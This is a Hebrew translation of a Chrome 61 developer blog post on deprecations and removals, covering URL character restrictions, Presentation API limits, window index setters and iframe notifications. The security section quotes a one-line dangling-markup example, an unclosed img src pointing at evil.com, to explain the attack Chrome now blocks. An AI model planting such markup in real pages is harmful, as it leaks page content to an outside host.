הוצאה משימוש והסרות ב-Chrome 61

Joe Medley
Joe Medley
GitHub

כמעט בכל גרסה של Chrome אנחנו מוסיפים מספר רב של עדכונים ושיפורים למוצר, לביצועים שלו וליכולות של פלטפורמת האינטרנט. במאמר הזה מתוארים הפריטים שהוצאו משימוש והפריטים שהוסרו ב-Chrome 61, שזמין בגרסת בטא החל מ-3 באוגוסט. הרשימה הזו עשויה להשתנות בכל שלב.

אבטחה ופרטיות

חסימת משאבים שכתובות ה-URL שלהם מכילות את התווים '\n' ו-'<'

יש סוג של פריצה שנקרא החדרת תגי עיצוב תלויים, שבו נעשה שימוש בכתובת URL חתוכה כדי לשלוח נתונים לנקודת קצה חיצונית. לדוגמה, נניח שיש דף שמכיל את <img src='https://evil.com/?. מכיוון שכתובת ה-URL לא מכילה גרש סגירה, הדפדפנים יקראו עד לגרש הבא שיופיע ויתייחסו לתוים שמקובצים בתו הזה כאילו מדובר בכתובת URL אחת.

כדי לצמצם את נקודת החולשה הזו, בגרסה 61 של Chrome הוגבלו קבוצות התווים שמותר להשתמש בהן במאפיינים href ו-src. באופן ספציפי, Chrome יפסיק לעבד כתובות URL כשהוא נתקל בתווים של שורה חדשה (\n) ובתווים של פחות מ- (<).

מפתחים שיש להם תרחיש לדוגמה לגיטימי לשימוש במעבר שורה ובפחות תווים בכתובת URL צריכים להשתמש במקום זאת בהימלטות מהתווים האלה.

כוונה להסרה | מעקב אחר סטטוס Chrome | באג ב-Chromium

הוצאה משימוש והסרה של Presentation API בהקשרים לא מאובטחים

נמצא שבמקורות לא מאובטחים, אפשר להשתמש ב-Presentation API כוקטור לפריצה. מכיוון שלמסכים אין סרגל כתובות, אפשר להשתמש ב-API כדי לזייף תוכן. אפשר גם לחלץ נתונים מהצגה פעילה.

בהתאם לכוונה של Blink להסיר תכונות חזקות ממקורות לא מאובטחים, אנחנו מתכננים להוציא משימוש את התמיכה ב-Presentation API ולהסיר אותה מהקשרים לא מאובטחים. החל מגרסה 61 של Chrome, האפשרות PresentationRequest.start() לא תפעל יותר במקורות לא מאובטחים.

כוונה להסרה | מעקב אחר סטטוס Chrome | באג ב-Chromium

JavaScript

איסור הגדרת נכסים שנוספו לאינדקס בחלונות

בעבר, בדפדפנים מסוימים אפשר היה להקצות משימות JavaScript כמו:

    window[0] = 1;

במפרט הנוכחי של HTML מצוין שזו הפרה מפורשת של מפרט JavaScript. לכן, היכולת הזו הוסרה ב-Chrome 61. החל מפברואר 2016, דפדפן Firefox כבר עומד בדרישות.

באג ב-Chromium

הסרת השימוש בהתראות מ-iframe לא מאובטח

בקשות הרשאה מ-iframes עלולות לבלבל משתמשים, כי קשה להבחין בין המקור של הדף שמכיל את ה-iframe לבין המקור של ה-iframe ששולח את הבקשה. כשהיקף הבקשות לא ברור, קשה למשתמשים להחליט אם להעניק או לדחות את ההרשאה.

איסור ההתראות ב-iframes יעזור גם להתאים את הדרישות להרשאת התראות לדרישות של התראות דחיפה, וכך להקל על המפתחים.

מפתחים שזקוקים לפונקציה הזו יכולים לפתוח חלון חדש כדי לבקש הרשאה לקבלת התראות.

כוונה להסרה | מעקב אחר סטטוס Chrome | באג ב-Chromium